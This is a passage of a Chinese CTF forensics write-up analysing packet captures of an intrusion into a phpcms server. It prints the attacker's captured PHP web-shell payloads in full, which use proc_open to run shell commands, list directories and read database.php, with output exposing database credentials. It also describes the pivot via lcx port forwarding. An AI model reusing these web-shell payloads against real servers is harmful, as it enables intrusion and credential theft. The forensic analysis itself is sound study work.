//.......... akey 'snda_skey' => '', //.......... skey 'qq_akey' => '', //qq skey 'qq_skey' => '', //qq skey 'qq_appkey' => '', //QQ........ appkey 'qq_appid' => '', //QQ........ appid 'qq_callback' => '', //QQ........ callback 'admin_url' => '', //.................. ); ?> @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/include/;whoami;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die(); // 执行命令 whoami www-data @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;uname -a;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die(); // 执行命令 uname -a Linux localhost 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;ipconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die(); // 执行命令 : pwd /var/www/html/uploadfile/2017/0905 @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;ifconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die(); // 执行命令 ifconfig ens33 Link encap:Ethernet HWaddr 00:0c:29:da:d6:4e inet addr:192.168.20.88 Bcast:192.168.20.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:feda:d64e/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:150300 errors:0 dropped:0 overruns:0 frame:0 TX packets:49841 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:162871217 (162.8 MB) TX bytes:5569466 (5.5 MB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:227 errors:0 dropped:0 overruns:0 frame:0 TX packets:227 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:20038 (20.0 KB) TX bytes:20038 (20.0 KB) @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die(); // 读取目录 /var/www/html/include/ 下的所有文件 ERROR:// Path Not Found Or No Permission! @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die(); // 读取目录 /var/www/ 下的所有文件 ./ 2017-09-03 03:30:49 4096 0755 html/ 2017-09-03 03:38:34 4096 0777 ../ 2017-09-03 00:57:48 4096 0755 @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die(); // 读取目录 /var/www/html/ 下的所有文件 phpsso_server/ 2017-09-03 03:31:30 4096 0777 api/ 2017-09-03 03:31:44 4096 0777 statics/ 2017-09-03 03:31:44 4096 0777 caches/ 2017-09-03 03:45:14 4096 0777 ./ 2017-09-03 03:38:34 4096 0777 html/ 2017-09-03 03:37:50 4096 0777 phpcms/ 2017-09-03 03:31:27 4096 0777 ../ 2017-09-03 03:30:49 4096 0755 uploadfile/ 2017-09-05 02:25:38 4096 0777 api.php 2017-09-03 03:31:44 989 0777 plugin.php 2017-09-03 03:31:44 3593 0777 favicon.ico 2017-09-03 03:31:44 3158 0777 js.html 2017-09-03 03:31:44 520 0777 crossdomain.xml 2017-09-03 03:31:44 104 0777 admin.php 2017-09-03 03:31:44 48 0777 robots.txt 2017-09-03 03:31:44 170 0777 index.php 2017-09-03 03:31:44 313 0777 index.html 2017-09-05 00:13:08 9578 0777 @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die(); // 读取目录 /var/www/html/ 下的所有文件 @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die(); // 读取目录 /var/www/html/phpcms/ 下的所有文件 ./ 2017-09-03 03:31:16 4096 0777 classes/ 2017-09-03 03:31:16 4096 0777 data/ 2017-09-03 03:31:16 4096 0777 ../ 2017-09-03 03:31:27 4096 0777 functions/ 2017-09-03 03:31:16 4096 0777 index.html 2017-09-03 03:31:16 1 0777 @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/libs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die(); // 读取目录 /var/www/html/phpcms/libs/ 下的所有文件 ./ 2017-09-03 03:31:16 4096 0777 classes/ 2017-09-03 03:31:16 4096 0777 data/ 2017-09-03 03:31:16 4096 0777 ../ 2017-09-03 03:31:27 4096 0777 functions/ 2017-09-03 03:31:16 4096 0777 index.html 2017-09-03 03:31:16 1 0777 @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/libs/data/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die(); // 读取目录 /var/www/html/phpcms/libs/data/ 下的所有文件 ./ 2017-09-03 03:31:16 4096 0777 font/ 2017-09-03 03:31:16 4096 0777 ../ 2017-09-03 03:31:16 4096 0777 ipdata/ 2017-09-03 03:31:16 4096 0777 dict/ 2017-09-03 03:31:16 4096 0777 @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die(); // 读取目录 /var/www/html/include/ 下的所有文件 ERROR:// Path Not Found Or No Permission! @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die(); // 读取目录 /var/www/html/caches/ 下的所有文件 caches_admin/ 2017-09-03 03:37:50 4096 0777 caches_content/ 2017-09-03 03:37:50 4096 0777 poster_js/ 2017-09-03 03:37:50 4096 0777 bakup/ 2017-09-03 03:37:50 4096 0777 caches_commons/ 2017-09-03 03:37:50 4096 0777 caches_tpl_data/ 2017-09-03 03:37:50 4096 0777 caches_linkage/ 2017-09-03 03:37:50 4096 0777 caches_model/ 2017-09-03 03:37:50 4096 0777 ./ 2017-09-03 03:45:14 4096 0777 vote_js/ 2017-09-03 03:37:50 4096 0777 caches_search/ 2017-09-03 03:38:33 4096 0755 caches_scan/ 2017-09-03 03:37:50 4096 0777 caches_member/ 2017-09-03 03:37:50 4096 0777 sessions/ 2017-09-03 03:37:50 4096 0777 ../ 2017-09-03 03:38:34 4096 0777 configs/ 2017-09-03 03:37:50 4096 0777 caches_template/ 2017-09-03 03:45:14 4096 0777 install.lock 2017-09-03 03:38:34 0 0644 error_log.php 2017-09-05 02:54:12 769 0644 index.html 2017-09-03 03:31:45 1 0777 @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/configs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die(); // 读取目录 /var/www/html/caches/configs/ 下的所有文件 ./ 2017-09-03 03:37:50 4096 0777 ../ 2017-09-03 03:45:14 4096 0777 ku6server.php 2017-09-03 03:31:45 208 0777 sub_config.php 2017-09-03 03:31:45 1376 0777 route.php 2017-09-03 03:31:45 803 0777 credit.php 2017-09-03 03:31:45 122 0777 cache.php 2017-09-03 03:31:45 330 0777 database.php 2017-09-03 03:38:32 324 0777 model_config.php 2017-09-03 03:31:45 52 0777 version.php 2017-09-03 03:31:45 118 0777 modules.php 2017-09-03 03:38:33 212 0777 ku6status_config.php 2017-09-03 03:31:45 781 0777 snda.php 2017-09-03 03:31:45 51 0777 system.php 2017-09-05 00:11:58 2430 0777 @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/caches/configs/database.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die(); // 读取文件 /var/www/html/caches/configs/database.php 内容 @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="/var/www/html/caches/configs/database.php";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die(); // 读取文件 /var/www/html/caches/configs/database.php 内容 array ( 'hostname' => 'localhost', 'port' => 3306, 'database' => 'phpcmsv9', 'username' => 'root', 'password' => '123456', 'tablepre' => 'v9_', 'charset' => 'gbk', 'type' => 'mysqli', 'debug' => true, 'pconnect' => 0, 'autoconnect' => 0 ), ); ?> @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die(); // 读取目录 /var/www/html/include/ 下的所有文件 @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die(); // 读取目录 /var/www/html/ 下的所有文件

攻击者的思路以及攻击流程也理清楚了
首先攻击者(172.16.10.110)通过一台可以访问到的 Windows 主机 192.168.20.117 (Dedecms) 拿到 webshell 以后
通过 lcx 将内网的主机 192.168.20.88 的 80 端口(phpcms)转发到 172.16.10.110 的 8888 端口
进一步利用漏洞拿到内网主机的权限

到这里 HTTP 层面的题目感觉应该已经分析的差不多了 , 只要拿到题目应该就可以直接填答案了
这道题目还提供了 ftp 的日志
应该还和 ftp 协议有关

#!/bin/bash
#ftp.sh

target_folder='ftp'

mkdir ${target_folder}

for file in `ls *.pcap`;
do
   echo "Dumping ftp package in ${file}..."
   tcpdump -A -s 0 'host 192.168.20.117 or host 192.168.20.248' -r $file -w ${target_folder}/${file}
   echo "${file} Done!"
done
[信息安全铁人三项赛总决赛](数据赛)第四题_第11张图片
image.png
[信息安全铁人三项赛总决赛](数据赛)第四题_第12张图片
image.png
[信息安全铁人三项赛总决赛](数据赛)第四题_第13张图片
image.png

虽然有 FTP 的包 , 但是似乎并没有日志中的IP
有可能是我数据包拷贝的不全 ?

你可能感兴趣的:([信息安全铁人三项赛总决赛](数据赛)第四题)